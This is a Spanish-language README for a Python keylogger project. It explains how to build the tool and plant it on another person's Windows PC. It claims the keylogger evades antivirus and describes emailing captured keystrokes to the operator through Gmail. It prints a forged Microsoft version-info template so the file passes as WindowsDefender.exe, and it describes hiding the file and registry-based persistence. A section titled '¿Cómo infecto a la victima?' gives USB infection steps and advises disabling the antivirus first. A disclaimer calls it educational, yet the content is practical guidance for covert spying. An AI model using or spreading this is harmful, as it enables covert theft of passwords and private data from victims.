╔╗╔═╗      ╔╗               ╔╗╔╗╔╗     ╔╗
║║║╔╝      ║║               ║║║║║║     ║║
║╚╝╝╔══╦╗ ╔╣║╔══╦══╦══╦══╦═╗║║║║║╠╦═╗╔═╝╠══╦╗╔╗╔╦══╗
║╔╗║║║═╣║ ║║║║╔╗║╔╗║╔╗║║═╣╔╝║╚╝╚╝╠╣╔╗╣╔╗║╔╗║╚╝╚╝║══╣
║║║╚╣║═╣╚═╝║╚╣╚╝║╚╝║╚╝║║═╣║ ╚╗╔╗╔╣║║║║╚╝║╚╝╠╗╔╗╔╬══║
╚╝╚═╩══╩═╗╔╩═╩══╩═╗╠═╗╠══╩╝  ╚╝╚╝╚╩╝╚╩══╩══╝╚╝╚╝╚══╝
       ╔═╝║     ╔═╝╠═╝║
       ╚══╝     ╚══╩══╝                     v3.2.0

Documentación actualizada: 09-05-2020

Nota importante: Esta herramienta tiene como proposito general y de uso exclusivo para aprendizaje, se creó como parte de un curso Online de hacking de "Seguridad de sistemas informáticos", no me hago responsable de un posible mal uso de ésta herramienta.

Las razones por las cuales existen los Keyloggers, tienen como fin la seguridad de una empresa ya sea que estén viendo qué está haciendo el personal, cómo interactúan sus personas en las computadoras o que los atacantes intenten obtener información confidencial, como información de inicio de sesión u otros datos confidenciales. Este programa simplemente toma cada pulsación de tecla ingresada en el teclado y luego envía el archivo de registro por correo electrónico cada 2 horas.

Carpeta Principal

• Compile = Convierte el script *.py a *.exe
• Ejecutar.bat = Ejecuta el script - [para pruebas]
• icon.ico = Icono Windows Defender
• KeyloggerWindows.py = Código fuente del Keylogger
• LICENCE = Licencia
• README.md= Documentación
• InfoKey.md = Documentación: Recoleccion de registro de teclas.
• StartUp.reg = Modifica el Registro de Windows <== Desde la versión 3.2.0 este archivo fue removido ya que se encuentra adentro del código.
• version.txt = Información detalla de conversión .py a .exe
• WindowsDefender.exe = Keylogger Compilado 3.2.0

Caracteristicas

• Indetectable Antivirus: Windows Defender 02/05/2020, Avast, ESET NOD32

• Envío por Gmail: Envía el registro de teclas por Gmail en un log.txt.

  

• Recibe datos por varios correos: Hay una posibilidad de agregar 1 o más correos, y así el registro de teclas se envíe a varios correos a la vez.

• Verifica conexión a internet: El keylogger verifica si la computadora está conectada a internet, y si ese es el caso envía los datos, en caso contrario, no lo envía,

• Tiempo de envío personalizado: Usted puede elegir un intervalo de tiempo personalizado, en la cual desea que se envíe los archivos, No se recomienta que sean muy seguidos, ya que el servidor de mensajería de google, bloqueará la cuenta por 1 día, por eso el tiempo de intervalo de envío escogida es de 2 Horas, éstas horas se cuentan despues de iniciar el script

• Obtención de datos a prueba de errores: En otros keylogger al momento de enviar el log.txt, éste proceso demora entre 3 a 5 segundos, y en ese transcurso de tiempo el keylogger no obtiene el registro de teclas, en éste keylogger, ese error está solucionado, obteniendo siempre los datos, verifique aqui la lista de teclas que obtiene

• Segundo plano: Este keylogger, al ejecutarse en la linea de comando, sí mostrará una consola, solo por detalles de debuggeo, pero al ser compilada de *.py a *.exe el ejecutable resultante se ejecutará en segundo plano

• Disfraz: Al momento de ser convertido de *.py a *.exe. El Keylogger será disfrazado como WindowsDefender.exe con el ícono y la información del programa.

• Oculto: El Keylogger al iniciar se copia (Solo si ya está en un archivo *exe) a la carpeta "C:\Users\Public\Security\Windows Defender\" , y en esa carpeta encuentras el archivo log.txt.

• Iniciar automaticamente con el sistema: Modifica el registro de windows, más información aquí

• Segundo Gmail en caso de Error: En casó el correo principal sea bloqueada o tenga x problemas, se usará un segundo correo.

Caracteristicas en futuras actualizaciones:

• Conexión a una base de datos MySQL: Los datos recopilados serán enviados por una conexión a una base de datos en vez de por mensajes.
• Soporte de envió a otros buzones de correo: Se insertará un soporte para poder usar Outlook, yahoo u otros servicios de correo
• Conexión FTP: Envía el archivo log.txt vía FTP.
• Envía datos mediante FTP: enviará documentos, fotos y videos mediante una conexión FTP, en segundo plano.
• Portapapeles: Obtiene el texto del portapapeles.

Uso de Recursos de la PC

El programa se repite 2 veces ya que ésta utiza 2 hilos de ejecución

Proceso de preparación:

Requerimiento de paquetes de Python3.8:

• import pynput
• import getuser
• import datetime
• import os
• import time
• import yagmail
• import socket
• import threading

Pasos para elegir su correo

1. Es de suma urgencia habilitar el acceso a apps menos seguras de google, la cual lo puedes hacer desde éste link. En caso no lo habilites, el keylogger no podrá iniciar sesión en su Gmail

2. Use git clone https://github.com/SebastianEPH/Keylogger-py.git para descargar el repositorio en su computadora.

3. Abra el archivo KeyloggerWindows.py en su editor de texto.

4. Busque la función SendLog() y ahí encontrará las siguientes lineas de código, las cuales debe modificar, el correo primario remitente, el correo segundario remitente y el o los correos receptores.

# Correo de envío [Principal]      <=> Se enviará 
    sender_email_P       = "[email protected]"   # <<== Cambia éste correo
    sender_password_P    = "contraseña"          # <<== Contraseña del correo 

    # Correo de envío [Segundaria]     <=> Solo si hay algún problema de envío con el correo Principal
    sender_email_S       = "[email protected]"   # <<== Cambia éste correo
    sender_password_S    = "contraseña"          # <<== Contraseña del correo 

    # Correo o correos que recibirán el registro de datos `log.txt`
    receiver_email   = ["[email protected]", "[email protected]", "[email protected]"] # MultiCorreo

  # receiver_email   = ["[email protected]"]  # SingleCorreo

Proceso de conversión: *.py a *.exe

Se utilizará pyinstaller

1. En la carpeta principal encontrará dos archivos, uno llamado icon.ico y el otro version.txt, éstos 2 archivos son importantes para la conversión del *.py a *.exe.

   • icon.ico = El icono que tendrá el keylogger al ser convertido
   • version.txt = Información detallada del keyloger.

   Ambos archivos son importantes para ocultar el keylogger o tKeyloggerar de hacerlo pasar cómo un programa que no es, así como la siguiente imagen:

   

   Toda esa información puede ser modificada en el archivo de la plantilla version.txt

2. Disfraz [Información]: El el siguiente archivo version.txt, puedes modificar la información del *.exe la cual se supone que de ser creible.

VSVersionInfo(
  ffi=FixedFileInfo(
    filevers=(6, 1, 7601, 17514),
    prodvers=(6, 1, 7601, 17514),
    mask=0x3f,
    flags=0x0,
    OS=0x40004,
    fileType=0x1,
    subtype=0x0,
    date=(0, 0)
    ),
  kids=[
    StringFileInfo(
      [
      StringTable(
        u'040904B0',
        [StringStruct(u'CompanyName', u'Microsoft CorpoKeyloggerion'),
        StringStruct(u'FileDescription', u'Windows Security Health Host Key'),
        StringStruct(u'FileVersion', u'6.1.7601.17514 (win7sp1_rtm.101119-1850)'),
        StringStruct(u'InternalName', u'Windows Defender'),
        StringStruct(u'LegalCopyright', u'\xa9 Microsoft CorpoKeyloggerion. All rights reserved.'),
        StringStruct(u'OriginalFilename', u'SecurityHealthHostKey.exe'),
        StringStruct(u'ProductName', u'Microsoft\xae Windows\xae OpeKeyloggering System'),
        StringStruct(u'ProductVersion', u'6.1.7601.17514')])
      ]), 
    VarFileInfo([VarStruct(u'Translation', [1033, 1200])])
  ]
)

3. Conversión final: Mediante Consola debe dirigirse a la carpeta principal. Los requisitos es tener instalada la librería pyinstaller, porfavor mire un tutorial antes de hacer éste proceso, la linea de comando recomendada es la siguiente:

   pyinstaller --clean   --distpath "Keylogger Terminado" -F --windowed --icon icon.ico --version-file version.txt KeyloggerWindows.py

¿Cómo infecto a la victima?

• Usten tendrá al finalizar 2 archivos:
• El archivo llamado WindowsDefender.exe es el keylogger.
• El archivo llamado , modifica el registro de windows, y hace que el keylogger se ejecute siempre al iniciar el usuario.

Método de infección:

¿Cómo infecto a la victima?

Nota: No cambiar de nombre al archivo WindowsDefender.exe, si usted le cambia el nombre, el Keylogger quedará obsoleto.

• Usten guardará el archivo en un USB.
• Conectará el USB a la [PC] a infectar.
• Se recomienda desactivar el antivirus o agregar una exclusión en al siguiente ruta: "C:\Users\Public\Security\Windows Defender".
• Lo siguiente es ejecutar el archivo WindowsDefender.exe en el USB, el Keylogger se replicará en la siguiente ruta "C:\Users\Public\Security\Windows Defender", Se recomienda no sacar el USB al instante ya que el Keylogger se estará replicando en la ruta.

NOTA: Al ejecutar el archivó, ésta automaticamente modificará el registro de windows para que se inicie siempre al prender la computadora.

El Keylogger tKeyloggerará de modificar la siguiente ruta del registro "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" por lo cual necesitará permisos de administrador, por ende se recomienda que la primera ejecución se realice con permisos de administrador, en caso de que no lo ejecute con permisos de administrador, el Keylogger modificará la siguiente ruta "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"

Explicación:

• HKEY_LOCAL_MACHINE: El Keylogger se ejecutará en todos los usuarios exitentes y los nuevos usuarios de la computadora
• HKEY_CURRENT_USER: El Keylogger solo se ejecutará en el usuario actual, si se llegará a crear otro usuario, el Keylogger Solo funcionará en el usuario principal

---

---

---

By SebastianEPH

• Github
• Facebook
• Linkedin
• Telegram